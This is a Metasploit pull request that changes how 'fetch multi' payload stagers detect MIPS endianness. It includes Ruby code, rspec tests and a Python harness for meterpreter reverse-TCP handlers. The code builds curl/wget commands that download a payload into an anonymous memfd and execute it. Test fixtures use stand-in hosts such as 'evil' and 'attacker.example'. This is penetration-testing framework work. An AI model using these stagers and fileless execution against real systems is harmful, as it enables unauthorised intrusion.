### PR TITLE
Add Fetch Multi Endian Check for MIPS

### DIFF
--- a/docs/metasploit-framework.wiki/How-to-use-fetch-payloads.md
+++ b/docs/metasploit-framework.wiki/How-to-use-fetch-payloads.md
@@ -40,17 +40,19 @@ For example:
 ## Fetch Multi
 The Fetch Multi Arch payload (cmd/linux/http[s]/multi/<payload>) is a specific Linux Fetch payload type that identifies
 the architecture of the target host during the execution of the command-based stager. The command-based stager embeds
-the architecture as a query string in the download request so that the fetch server serves the right payload for the
-target architecture. This allows users to launch a remote exploit without knowing the architecture of the target
-system.
+the architecture as query strings in the download request so that the fetch server serves the right payload for the
+target architecture. For some architectures like MIPS, the `uname -m` does not confer the endianness of a target, so
+we also have the fetch payload report the endianness of `/bin/sh` to guarantee we send the correct elf architecture.
 Limitations: 
 1. The payload uses a query string to report the target arch, so it only works with HTTP[S] fetch protocol payloads.
 2. We don't support much AARCH64 on Windows, and x86 is well-emulated on Windows hosts, so for now, this only supports
 Linux.
-3. There exists a curious and annoying feature in some mips kernels that they return `mips` as the `uname -m` value.  This
-_normally_ means that the target is mipsbe, but there are some cases when it is actually mipsel/mipsle.  If your target
-reports that the uname value is 'mips' it will be served a mipsbe payload, but there will be a warning message that
-suggests you try an explicit mipsle payload if the automatic mipsbe payload fails.
+3. Early implementations of fetch multi only return the `uname -m` value because according to Debian documentation, if
+`uname -m` reported `mips`, the host was `mipsbe` and if it reported `mipsel`, the host was `mipsel`.  It turns out in
+the wild, both `mipsel` and `mipsbe` hosts will report the `uname -m` value as `mips`. `mipsel` is by far the more
+common endian value, so when a payload provides only the `uname -m` value of `mips` and no endian value (like the old
+fetch payloads) we serve a `mipsel` payload.  Previously, when a payload reported only `mips` we served a `mipsbe`
+payload because that's what the documentation suggested the endianness would be.
 
 ## A Simple Stand-Alone Example
 The fastest way to understand Fetch Payloads is to use them and examine the output. For example, let's assume a Linux

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -382,7 +382,7 @@ module Msf::Payload::Adapter::Fetch
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
-    get_file_cmd << '?arch=$(uname -m)' if dynamic_arch
+    get_file_cmd << '?arch=$(uname -m)\&endian=$(printf %d \\\'$(head -c6 /bin/sh|tail -c1))' if dynamic_arch
     _execute_add(get_file_cmd)
   end
 

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -498,7 +498,7 @@ module Msf::Payload::Adapter::Fetch
     else
       fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
     end
-    get_file_cmd << '?arch=$(uname -m)' if dynamic_arch
+    get_file_cmd << '?arch=$(uname -m)\&endian=$(printf %d \\\'$(head -c6 /bin/sh|tail -c1))' if dynamic_arch
     _execute_add(get_file_cmd)
   end
 

--- a/lib/msf/core/payload/adapter/fetch/fileless.rb
+++ b/lib/msf/core/payload/adapter/fetch/fileless.rb
@@ -303,8 +303,13 @@ def _generate_fileless_shell(get_file_cmd, arch)
 end
   
   # same idea as _generate_fileless function, but force creating anonymous file handle
+  #
+  # get_file_cmd is base64-encoded and decoded again inside the python one-liner, since it
+  # can contain shell metacharacters (e.g. the arch/endian query string) that would otherwise
+  # break out of the single-quoted `python3 -c '...'` argument it's embedded in.
   def _generate_fileless_python(get_file_cmd)
-    %Q<python3 -c 'import os;fd=os.memfd_create("",os.MFD_CLOEXEC);os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";#{get_file_cmd};$f&")'> 
+    encoded_get_file_cmd = Base64.strict_encode64(get_file_cmd)
+    %Q<python3 -c 'import os,base64;fd=os.memfd_create("",os.MFD_CLOEXEC);get_file_cmd=base64.b64decode("#{encoded_get_file_cmd}").decode();os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";{get_file_cmd};$f&")'>
   end
   
    # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -62,8 +62,8 @@ module Msf
     end
 
     def identify_arch(query_string)
-      arch_param = query_string.include?('arch') ? query_string['arch'] : nil
-      endian_param = query_string.include?('endian') ? query_string['endian'] : nil
+      arch_param = normalize_query_param(query_string['arch'])
+      endian_param = normalize_query_param(query_string['endian'])
       vprint_status("Detected #{arch_param}") unless arch_param.nil?
       vprint_status('Detected big endian') if endian_param == '2'
       vprint_status('Detected little endian') if endian_param == '1'
@@ -85,11 +85,17 @@ module Msf
         elsif endian_param.to_i == 2
           arch = Rex::Arch.from_uname('mips')
         else
-          print_error("Unknown endian value reported: #{endian_param}")
-          arch = nil
+          print_warning("Unknown endian value reported: #{endian_param}")
+          print_warning('We are guessing this means mipsel and are serving a mipsel payload.')
+          print_warning('If it fails, try using an explicit mipsbe payload.')
+          arch = Rex::Arch.from_uname('mipsel')
         end
       end
       arch
+    end
+
+    def normalize_query_param(value)
+      value.is_a?(Array) ? value.first : value
     end
 
     def on_request_uri(cli, request, srv_entry)
@@ -104,7 +110,8 @@ module Msf
         query_string = request.uri_parts['QueryString'] || {}
         arch = identify_arch(query_string)
         if arch.nil?
-          if query_string['arch'].nil? || query_string['arch'].strip.empty?
+          arch_param = normalize_query_param(query_string['arch'])
+          if arch_param.nil? || arch_param.strip.empty?
             cli.send_response(fetch_error_response(400, 'Bad Request'))
           else
             print_error('Failed to identify arch based on query string. Sending 404.')

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -65,30 +65,30 @@ module Msf
       arch_param = query_string.include?('arch') ? query_string['arch'] : nil
       endian_param = query_string.include?('endian') ? query_string['endian'] : nil
       vprint_status("Detected #{arch_param}") unless arch_param.nil?
-      vprint_status("Detected big endian") if endian_param == '2'
-      vprint_status("Detected little endian") if endian_param == '1'
-      vprint_status("No Endian data detected") if endian_param == nil
+      vprint_status('Detected big endian') if endian_param == '2'
+      vprint_status('Detected little endian') if endian_param == '1'
+      vprint_status('No Endian data detected') if endian_param.nil?
       if arch_param.nil? || arch_param.strip.empty?
         print_error('Fetch request missing required arch query parameter')
-        cli.send_response(fetch_error_response(400, 'Bad Request'))
         return nil
       end
       arch = Rex::Arch.from_uname(arch_param)
-      # Mips hosts lie.  We need to verify the Endian value
+      # Mips hosts are inconsistent with only uname, so we are just guessing, here.
       if arch_param == 'mips'
         if endian_param.nil?
           print_warning("Uname reports 'mips' and no endian data received.")
-          print_warning("We are guessing this means mipsel and are serving a mipsel payload.")
-          print_warning("If it fails, try using an explicit mipsbe payload.")
+          print_warning('We are guessing this means mipsel and are serving a mipsel payload.')
+          print_warning('If it fails, try using an explicit mipsbe payload.')
           arch = Rex::Arch.from_uname('mipsel')
-        elsif endian_param.to_i = 1
+        elsif endian_param.to_i == 1
           arch = Rex::Arch.from_uname('mipsel')
-        elsif endian_param.to_i = 2
+        elsif endian_param.to_i == 2
           arch = Rex::Arch.from_uname('mips')
         else
-          print_bad("Unknown endian value reported: #{endian_param}")
+          print_error("Unknown endian value reported: #{endian_param}")
           arch = nil
         end
+      end
       arch
     end
 
@@ -99,30 +99,33 @@ module Msf
       if (user_agent = request.headers['User-Agent'])
         client += " (#{user_agent})"
       end
-      vprint_status("Sending payload to #{client}")
       if opts[:dynamic_arch]
         vprint_status("Dynamic Payload Detected, expecting a Query String in the request...")
         query_string = request.uri_parts['QueryString'] || {}
-        vprint_status("query_string = #{query_string}")
+        arch = identify_arch(query_string)
         if arch.nil?
-          print_error("Failed to identify the architecture in Query String #{arch_param}")
-          cli.send_response(fetch_error_response(404, 'Not Found'))
-          return
-        end
-        vprint_status("Building payload for #{arch} arch")
-
-        opts[:arch] = arch
-        # Call generate with arch and dynamic_arch populated properly to build the right binary
-        payload_exe = generate(opts)
-        if payload_exe.nil?
-          print_error("No payload available for #{arch}")
-          cli.send_response(fetch_error_response(404, 'Not Found'))
+          if query_string['arch'].nil? || query_string['arch'].strip.empty?
+            cli.send_response(fetch_error_response(400, 'Bad Request'))
+          else
+            print_error('Failed to identify arch based on query string. Sending 404.')
+            cli.send_response(fetch_error_response(404, 'Not Found'))
+          end
         else
-          cli.send_response(payload_response(payload_exe))
+          vprint_status("Building payload for #{arch} arch")
+          opts[:arch] = arch
+          # Call generate with arch and dynamic_arch populated properly to build the right binary
+          payload_exe = generate(opts)
+          if payload_exe.nil?
+            print_error("No payload available for #{arch}")
+            cli.send_response(fetch_error_response(404, 'Not Found'))
+          else
+            cli.send_response(payload_response(payload_exe))
+          end
         end
       else
         cli.send_response(payload_response(srv_entry[:data]))
       end
+      vprint_status("Sent payload to #{client}")
     end
 
     def fetch_error_response(code, message)

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -61,6 +61,37 @@ module Msf
       fetch_service
     end
 
+    def identify_arch(query_string)
+      arch_param = query_string.include?('arch') ? query_string['arch'] : nil
+      endian_param = query_string.include?('endian') ? query_string['endian'] : nil
+      vprint_status("Detected #{arch_param}") unless arch_param.nil?
+      vprint_status("Detected big endian") if endian_param == '2'
+      vprint_status("Detected little endian") if endian_param == '1'
+      vprint_status("No Endian data detected") if endian_param == nil
+      if arch_param.nil? || arch_param.strip.empty?
+        print_error('Fetch request missing required arch query parameter')
+        cli.send_response(fetch_error_response(400, 'Bad Request'))
+        return nil
+      end
+      arch = Rex::Arch.from_uname(arch_param)
+      # Mips hosts lie.  We need to verify the Endian value
+      if arch_param == 'mips'
+        if endian_param.nil?
+          print_warning("Uname reports 'mips' and no endian data received.")
+          print_warning("We are guessing this means mipsel and are serving a mipsel payload.")
+          print_warning("If it fails, try using an explicit mipsbe payload.")
+          arch = Rex::Arch.from_uname('mipsel')
+        elsif endian_param.to_i = 1
+          arch = Rex::Arch.from_uname('mipsel')
+        elsif endian_param.to_i = 2
+          arch = Rex::Arch.from_uname('mips')
+        else
+          print_bad("Unknown endian value reported: #{endian_param}")
+          arch = nil
+        end
+      arch
+    end
+
     def on_request_uri(cli, request, srv_entry)
       opts = srv_entry[:opts].dup
       client = cli.peerhost
@@ -72,17 +103,7 @@ module Msf
       if opts[:dynamic_arch]
         vprint_status("Dynamic Payload Detected, expecting a Query String in the request...")
         query_string = request.uri_parts['QueryString'] || {}
-        arch_param = query_string['arch']
-        if arch_param.nil? || arch_param.strip.empty?
-          print_error('Fetch request missing required arch query parameter')
-          cli.send_response(fetch_error_response(400, 'Bad Request'))
-          return
-        end
-        arch = Rex::Arch.from_uname(arch_param)
-        if arch_param == 'mips'
-          print_warning("Detected 'mips' architecture using 'uname'. Normally, this means mipsbe, but it sometimes means mips[el|le].")
-          print_warning('Serving a mipsbe payload. If the payload fails, retry with an explicit mipsle payload.')
-        end
+        vprint_status("query_string = #{query_string}")
         if arch.nil?
           print_error("Failed to identify the architecture in Query String #{arch_param}")
           cli.send_response(fetch_error_response(404, 'Not Found'))

--- a/spec/lib/msf/core/payload/adapter/fetch/fileless_spec.rb
+++ b/spec/lib/msf/core/payload/adapter/fetch/fileless_spec.rb
@@ -1,0 +1,60 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Payload::Adapter::Fetch::Fileless do
+  let(:harness_class) do
+    Class.new do
+      include Msf::Payload::Adapter::Fetch::Fileless
+    end
+  end
+
+  subject(:harness) { harness_class.new }
+
+  # Representative of the get_file_cmd curl/wget build when FETCH dynamic_arch is
+  # enabled: it contains a literal single quote plus other shell metacharacters
+  # ($, &). Embedded unencoded, that quote previously closed the python3 -c '...'
+  # argument early and broke out into raw shell syntax.
+  let(:get_file_cmd) { 'curl -so /tmp/x http://evil/uri?arch=$(uname -m)\&endian=$(printf %d \'$(head -c6 /bin/sh|tail -c1))' }
+
+  describe '#_generate_fileless_python' do
+    subject(:cmd) { harness._generate_fileless_python(get_file_cmd) }
+
+    it 'never embeds get_file_cmd verbatim in the generated one-liner' do
+      expect(cmd).not_to include(get_file_cmd)
+    end
+
+    it 'base64-decodes back to the exact original get_file_cmd' do
+      encoded = cmd[/b64decode\("([^"]+)"\)/, 1]
+      expect(encoded).not_to be_nil
+      expect(Base64.strict_decode64(encoded)).to eq(get_file_cmd)
+    end
+
+    it 'keeps the python -c argument as a single balanced single-quoted string' do
+      # The only single quotes in the whole command must be the two delimiting
+      # `python3 -c '...'`. If get_file_cmd's own single quote (or any other
+      # metacharacter) leaked in unencoded, this count would be higher and the
+      # command would break out of the intended python argument.
+      expect(cmd.count("'")).to eq(2)
+      expect(cmd).to match(/\Apython3 -c '.*'\z/)
+    end
+
+    it 'decodes and runs get_file_cmd through the shell via os.system' do
+      expect(cmd).to include('os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";{get_file_cmd};$f&")')
+    end
+  end
+
+  describe '#_generate_fileless_bash_search' do
+    subject(:cmd) { harness._generate_fileless_bash_search(get_file_cmd) }
+
+    it 'embeds get_file_cmd directly, since the surrounding script text is unquoted' do
+      expect(cmd).to include("if $(#{get_file_cmd} >/dev/null)")
+    end
+  end
+
+  describe '#_generate_fileless_shell' do
+    subject(:cmd) { harness._generate_fileless_shell(get_file_cmd, 'mipsle') }
+
+    it 'embeds get_file_cmd directly, since the surrounding script text is unquoted' do
+      expect(cmd).to include("then if $(#{get_file_cmd} >/dev/null)")
+    end
+  end
+end

--- a/spec/lib/msf/core/payload/adapter/fetch/server/http_spec.rb
+++ b/spec/lib/msf/core/payload/adapter/fetch/server/http_spec.rb
@@ -1,0 +1,184 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Payload::Adapter::Fetch::Server::HTTP do
+  let(:harness_class) do
+    Class.new do
+      include Msf::Payload::Adapter::Fetch::Server::HTTP
+
+      def register_advanced_options(*); end
+      def print_error(*); end
+      def print_warning(*); end
+      def print_status(*); end
+      def vprint_status(*); end
+      def generate(opts = {}); end
+    end
+  end
+
+  subject(:harness) { harness_class.new }
+
+  describe '#identify_arch' do
+    context 'when the arch query param is missing' do
+      it 'prints an error and returns nil' do
+        expect(harness).to receive(:print_error).with(/missing required arch/)
+        expect(harness.identify_arch({})).to be_nil
+      end
+    end
+
+    context 'when the arch query param is blank' do
+      it 'prints an error and returns nil' do
+        expect(harness).to receive(:print_error).with(/missing required arch/)
+        expect(harness.identify_arch({ 'arch' => '  ' })).to be_nil
+      end
+    end
+
+    context 'when the arch is unambiguous' do
+      it 'maps a plain x86_64 uname string to x64' do
+        expect(harness.identify_arch({ 'arch' => 'x86_64' })).to eq(Rex::Arch::ARCH_X64)
+      end
+
+      it 'maps aarch64 to aarch64' do
+        expect(harness.identify_arch({ 'arch' => 'aarch64' })).to eq(Rex::Arch::ARCH_AARCH64)
+      end
+
+      it 'returns nil for an arch uname does not recognize' do
+        expect(harness.identify_arch({ 'arch' => 'not-a-real-arch' })).to be_nil
+      end
+    end
+
+    context 'when the arch is mips' do
+      it 'guesses mipsel and warns when no endian data is present' do
+        expect(harness).to receive(:print_warning).at_least(:once)
+        expect(harness.identify_arch({ 'arch' => 'mips' })).to eq(Rex::Arch::ARCH_MIPSLE)
+      end
+
+      it 'resolves to mipsel when endian is 1 (little)' do
+        expect(harness.identify_arch({ 'arch' => 'mips', 'endian' => '1' })).to eq(Rex::Arch::ARCH_MIPSLE)
+      end
+
+      it 'resolves to mips (big endian) when endian is 2' do
+        expect(harness.identify_arch({ 'arch' => 'mips', 'endian' => '2' })).to eq(Rex::Arch::ARCH_MIPSBE)
+      end
+
+      it 'warns and falls back to mipsel for an unrecognized endian value' do
+        expect(harness).to receive(:print_warning).with(/Unknown endian value/)
+        expect(harness).to receive(:print_warning).at_least(:once)
+        expect(harness.identify_arch({ 'arch' => 'mips', 'endian' => '9' })).to eq(Rex::Arch::ARCH_MIPSLE)
+      end
+    end
+
+    context 'when the arch is mipsel' do
+      it 'is unaffected by the mips endian-guessing logic' do
+        expect(harness.identify_arch({ 'arch' => 'mipsel', 'endian' => '2' })).to eq(Rex::Arch::ARCH_MIPSLE)
+      end
+    end
+
+    context 'when a query param is duplicated in the request' do
+      it 'uses the first arch value instead of raising on the array' do
+        expect(harness.identify_arch({ 'arch' => %w[x86_64 aarch64] })).to eq(Rex::Arch::ARCH_X64)
+      end
+
+      it 'uses the first endian value instead of raising on the array' do
+        expect(harness.identify_arch({ 'arch' => 'mips', 'endian' => %w[2 1] })).to eq(Rex::Arch::ARCH_MIPSBE)
+      end
+    end
+  end
+
+  describe '#on_request_uri' do
+    let(:cli) { double('cli', peerhost: '192.0.2.1') }
+    let(:request) { double('request', uri: '/payload', headers: {}, uri_parts: { 'QueryString' => query_string }) }
+    let(:query_string) { {} }
+
+    context 'when dynamic_arch is disabled' do
+      let(:srv_entry) { { opts: { dynamic_arch: false }, data: 'static-payload-bytes' } }
+
+      it 'sends the static payload data as-is' do
+        expect(cli).to receive(:send_response) do |response|
+          expect(response.code).to eq(200)
+          expect(response.body).to eq('static-payload-bytes')
+        end
+        harness.on_request_uri(cli, request, srv_entry)
+      end
+    end
+
+    context 'when dynamic_arch is enabled' do
+      let(:srv_entry) { { opts: { dynamic_arch: true } } }
+
+      context 'and the arch query param is missing' do
+        let(:query_string) { {} }
+
+        it 'responds 400 Bad Request' do
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(400)
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+        end
+      end
+
+      context 'and the arch cannot be identified' do
+        let(:query_string) { { 'arch' => 'not-a-real-arch' } }
+
+        it 'responds 404 Not Found' do
+          allow(harness).to receive(:print_error)
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(404)
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+          expect(harness).to have_received(:print_error).with(/Failed to identify arch/)
+        end
+      end
+
+      context 'and the endian value for a mips host is unrecognized' do
+        let(:query_string) { { 'arch' => 'mips', 'endian' => 'garbage' } }
+
+        it 'falls back to mipsel and generates a payload for it' do
+          allow(harness).to receive(:print_warning)
+          expect(harness).to receive(:generate).with(hash_including(arch: Rex::Arch::ARCH_MIPSLE)).and_return('exe-bytes')
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(200)
+            expect(response.body).to eq('exe-bytes')
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+        end
+      end
+
+      context 'and the arch is identified but no payload is available' do
+        let(:query_string) { { 'arch' => 'x86_64' } }
+
+        it 'responds 404 Not Found' do
+          expect(harness).to receive(:generate).with(hash_including(arch: Rex::Arch::ARCH_X64)).and_return(nil)
+          expect(harness).to receive(:print_error).with(/No payload available/)
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(404)
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+        end
+      end
+
+      context 'and a payload is generated for the identified arch' do
+        let(:query_string) { { 'arch' => 'mips', 'endian' => '2' } }
+
+        it 'generates for the disambiguated mips arch and sends it back' do
+          expect(harness).to receive(:generate).with(hash_including(arch: Rex::Arch::ARCH_MIPSBE)).and_return('exe-bytes')
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(200)
+            expect(response.body).to eq('exe-bytes')
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+        end
+      end
+
+      context 'and the endian query param is absent entirely (e.g. an older/plain wget fetch)' do
+        let(:query_string) { { 'arch' => 'mips' } }
+
+        it 'still resolves a valid arch and generates a payload for it' do
+          expect(harness).to receive(:generate).with(hash_including(arch: Rex::Arch::ARCH_MIPSLE)).and_return('exe-bytes')
+          expect(cli).to receive(:send_response) do |response|
+            expect(response.code).to eq(200)
+            expect(response.body).to eq('exe-bytes')
+          end
+          harness.on_request_uri(cli, request, srv_entry)
+        end
+      end
+    end
+  end
+end

--- a/spec/lib/msf/core/payload/adapter/fetch_spec.rb
+++ b/spec/lib/msf/core/payload/adapter/fetch_spec.rb
@@ -1,0 +1,72 @@
+require 'spec_helper'
+require 'tempfile'
+
+RSpec.describe Msf::Payload::Adapter::Fetch do
+  let(:harness_class) do
+    Class.new do
+      include Msf::Payload::Adapter::Fetch
+
+      def initialize; end
+
+      def fetch_protocol
+        'HTTP'
+      end
+
+      def download_uri(_uri)
+        'attacker.example:8080/payload_uri'
+      end
+
+      def _remote_destination
+        '/tmp/payload'
+      end
+
+      def _execute_add(get_file_cmd)
+        get_file_cmd
+      end
+    end
+  end
+
+  subject(:harness) { harness_class.new }
+
+  # curl and wget both append the same dynamic-arch query string, and it must
+  # stay byte-for-byte in sync with what #identify_arch
+  # (lib/msf/core/payload/adapter/fetch/server/http.rb) expects to parse back out.
+  shared_examples 'a dynamic-arch aware fetch command' do |method|
+    it 'omits the arch/endian query string when dynamic_arch is false' do
+      cmd = harness.public_send(method, 'payload_uri', false)
+      expect(cmd).not_to include('?arch=')
+    end
+
+    it 'appends the exact arch/endian query string the fetch HTTP handler expects' do
+      cmd = harness.public_send(method, 'payload_uri', true)
+      expect(cmd).to include('?arch=$(uname -m)\&endian=$(printf %d \\\'$(head -c6 /bin/sh|tail -c1))')
+    end
+
+    it 'produces a shell fragment that resolves to a real arch/endian pair when executed' do
+      cmd = harness.public_send(method, 'payload_uri', true)
+      suffix = cmd[/\?arch=.*\)\)/]
+
+      resolved = Tempfile.create('fetch_endian_probe') do |f|
+        f.write("echo #{suffix}\n")
+        f.flush
+        `sh #{f.path}`.strip
+      end
+
+      expect(resolved).to match(/\A\?arch=\S+&endian=[12]\z/)
+
+      query_string = resolved.sub(/\A\?/, '').split('&').each_with_object({}) do |pair, h|
+        k, v = pair.split('=', 2)
+        h[k] = v
+      end
+      expect(query_string['arch']).to eq(`uname -m`.strip)
+    end
+  end
+
+  describe '#_generate_curl_command' do
+    include_examples 'a dynamic-arch aware fetch command', :_generate_curl_command
+  end
+
+  describe '#_generate_wget_command' do
+    include_examples 'a dynamic-arch aware fetch command', :_generate_wget_command
+  end
+end


### PR DESCRIPTION
## Description

### What does it do?
This PR
1. Adds a second parameter to the query string for fetch multi payloads to send the endianness.  
2. Encodes the Fetch shell command in base64 within the python command when FETCH_FILELESS is set to 3.8+.  This was necessary because we had to add a special character to the fetch command that breaks the python command.  I don't think this is a problem, as the base64 decode is done by python3.8 rather than the shell, and we can be relatively sure python3.8+ should have base64 decode functionality.

### Why is it needed?
This is needed because `uname` can be a dirty liar.  Some mipsel architectures report they are `mips`, but according to the documentation by Debian, if uname returns `mips`, the host should be mipsbe.  Unfortunately, in the wild, both mipsel and mipsbe Linux hosts report themselves as `mips`.
The current logic is based on the Debian docs that suggested mipsel hosts reported `mipsle` and mipsbe hosts reported `mips` so we could wind up sending the wrong endian elf.
There are likely some more fixes we should do (the rex::arch method needs to be figured out better, but that's outside the scope of this fix), but this stops the immediate problem with fetch multi payloads.

## Breaking Changes

There should not be any breaking changes.  Payloads calling back with only a single parameter in the query string remain supported, but we do just now _guess_ that a host reporting `mips` and no endianness is a mipsel target because mipsbe is pretty rare.

## Reviewer Notes

This is best tested in my test range where I have several of these targets.
You should definitely test this on the GLiNET AR300M and Unifi Edgerouter4 as both targets are mipsel and report as `mips`.

You can verify the behavior of previous payloads by just removing the second parameter from the query string before launching it.

## Verification Steps

Because we are testing on multiple architectures, I suggest using the following script that I authored with Claude:

<details><summary>Test Script</summary>

```
#!/usr/bin/env python3
"""
Test MSF Linux fetch multi (multi-arch HTTP/HTTPS) payload.
Tests FETCH_COMMAND × FETCH_FILELESS × FETCH_PIPE variants.
"""

import argparse
import concurrent.futures
import getpass
import random
import os
import paramiko
import re
import shlex
import subprocess
import sys
import tempfile
import threading
import time

_log_lock = threading.Lock()
_log_fh   = None
_ssh_sem  = None  # set in main() from --concurrent-threads; caps concurrent SSH connections below MaxStartups


def log(msg):
    with _log_lock:
        if _log_fh:
            _log_fh.write(msg + '\n')
            _log_fh.flush()


LHOST    = None
MSF_PATH = None

FILELESS_VALUES = ['none', 'python3.8+']  # 'shell' unsupported: requires arch-specific shellcode but multi uses ARCH_ANY
PIPE_VALUES     = [False, True]
PIPE_COMMANDS   = {'CURL', 'WGET'}

# Per-protocol config. srv_offset: fetch server ports start at base_port + srv_offset.
# Instances must be spaced >= 60 ports apart to avoid overlap.
PROTOCOLS = [
    {
        'name':           'HTTP',
        'payload':        'payload/cmd/linux/http/multi/meterpreter_reverse_tcp',
        'fetch_commands': ['CURL', 'WGET'],  # TNFTP omitted: no ?arch= query string support
        'pipe_supported': True,
        'proto_opts':     [],
        'srv_offset':     20,
    },
    {
        'name':           'HTTPS',
        'payload':        'payload/cmd/linux/https/multi/meterpreter_reverse_tcp',
        'fetch_commands': ['CURL', 'WGET'],  # TNFTP omitted: no ?arch= query string support
        'pipe_supported': True,
        'proto_opts':     ['set FETCH_CHECK_CERT false'],
        'srv_offset':     40,
    },
]

# Globals set in main() before any test logic runs
TARGET_HOST = None
TARGET_USER = None
TARGET_PASS = None
TARGET_PORT = None
_BASE_PORT  = None
LOG_FILE    = None
TESTS       = None
TESTS_BY_PROTO = None


def _safe(s):
    return s.replace('.', '_').replace('+', 'p').replace('-', '_')


def build_tests(base_port):
    tests = []
    lport   = base_port
    srvport = {p['name']: base_port + p['srv_offset'] for p in PROTOCOLS}

    for proto in PROTOCOLS:
        for fetch_cmd in proto['fetch_commands']:
            pipe_values = PIPE_VALUES if (fetch_cmd in PIPE_COMMANDS and proto['pipe_supported']) else [False]
            for fileless in FILELESS_VALUES:
                for pipe in pipe_values:
                    test_lport   = lport
                    lport       += 1
                    test_srvport = srvport[proto['name']]
                    srvport[proto['name']] += 1

                    pipe_suffix = 'pt' if pipe else 'pf'
                    uri = f"{proto['name'].lower()}_{fetch_cmd.lower()}_{_safe(fileless)}_{pipe_suffix}"

                    per_test_opts = [
                        f"set FETCH_COMMAND {fetch_cmd}",
                        f"set FETCH_FILELESS {fileless}",
                        f"set FETCH_PIPE {'true' if pipe else 'false'}",
                    ]
                    if fileless == 'none' and not pipe:
                        per_test_opts.append(f"set FETCH_FILENAME {uri}")
                    else:
                        per_test_opts.append("set FETCH_FILENAME ''")

                    extra_opts = [f"set FETCH_FILELESS {fileless}"]
                    extra_opts.extend(proto['proto_opts'])
                    extra_opts.append(f"set FETCH_PIPE {'true' if pipe else 'false'}")
                    if fileless == 'none' and not pipe:
                        extra_opts.append(f"set FETCH_FILENAME {uri}")

                    tests.append({
                        'name':          f"{proto['name']}/{fetch_cmd}/{fileless}/pipe={'true' if pipe else 'false'}",
                        'proto':         proto['name'],
                        'fetch_command': fetch_cmd,
                        'fileless':      fileless,
                        'pipe':          pipe,
                        'payload':       proto['payload'],
                        'fetch_srvport': test_srvport,
                        'lport':         test_lport,
                        'fetch_uripath': uri,
                        'extra_opts':    extra_opts,
                        'per_test_opts': per_test_opts,
                    })
    return tests


ANSI = re.compile(r'\x1b\[[0-9;]*m')


def _proto_log_path(proto_name):
    return f"/tmp/msf_fetch_multi_{proto_name.lower()}_{_BASE_PORT}.log"


def read_log(log_file):
    try:
        return ANSI.sub('', open(log_file).read())
    except FileNotFoundError:
        return ''


def write_proto_rc(proto_name, tests):
    p = next(pr for pr in PROTOCOLS if pr['name'] == proto_name)
    lines = [
        f"use {p['payload']}",
        f"set lhost {LHOST}",
        "set verbose true",
        "set FETCH_WRITABLE_DIR /tmp/",
    ]
    for opt in p['proto_opts']:
        lines.append(opt)

    for t in tests:
        lines.append("")
        lines.append(f"set fetch_srvport {t['fetch_srvport']}")
        lines.append(f"set lport {t['lport']}")
        lines.append(f"set fetch_uripath {t['fetch_uripath']}")
        for opt in t['per_test_opts']:
            lines.append(opt)
        lines.append("to_handler")

    lines += ["", "sleep 240", "sessions -l", "sessions -C 'load stdapi'", "sleep 90", "sessions -C sysinfo", "sleep 60", "sessions -C sysinfo"]

    slug = proto_name.lower()
    rc = tempfile.NamedTemporaryFile(
        mode='w', suffix='.rc', delete=False, prefix=f"msf_multi_{slug}_"
    )
    rc.write('\n'.join(lines) + '\n')
    rc.close()
    return rc.name


def run_msf(rc_file, log_file):
    return subprocess.Popen(
        ['bundle', 'exec', 'msfconsole', '-q', '-r', rc_file],
        stdin=subprocess.DEVNULL,
        stdout=open(log_file, 'w'),
        stderr=subprocess.STDOUT,
        cwd=MSF_PATH,
    )


def wait_for_n_handlers(log_file, n, timeout=180):
    start = time.time()
    while time.time() - start < timeout:
        content = read_log(log_file)
        if content.count('Started reverse TCP handler') >= n:
            return content
        if 'Exploit failed' in content or 'failed to bind' in content:
            return content
        time.sleep(2)
    return None


def parse_n_target_commands(log_content, n):
    matches = re.findall(r'Command to execute on target: (.+)', log_content)
    return [m.strip() for m in matches[:n]]


def ssh_run(command):
    with _ssh_sem:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(
            TARGET_HOST, port=TARGET_PORT, username=TARGET_USER, password=TARGET_PASS,
            timeout=10, allow_agent=False, look_for_keys=False,
        )
        _, stdout, stderr = client.exec_command('sh -c ' + shlex.quote(command))
        stdout.channel.settimeout(5)
        try:
            out = stdout.read().decode().strip()
        except Exception:
            out = ''
        try:
            err = stderr.read().decode().strip()
        except Exception:
            err = ''
        client.close()
    return out, err


def target_supports_python38():
    cmd = (
        'command -v python3 >/dev/null 2>&1 && '
        'python3 -c "import sys; print(1 if sys.version_info >= (3, 8) else 0)" || echo 0'
    )
    try:
        out, _ = ssh_run(cmd)
        return out.strip().endswith('1')
    except Exception as exc:
        log(f"[CHECK] Could not determine target Python version: {exc}")
        return False


def wait_for_sessions(log_file, lports, timeout=300):
    wanted = set(lports)
    found  = {}
    start  = time.time()
    while time.time() - start < timeout:
        content = read_log(log_file)
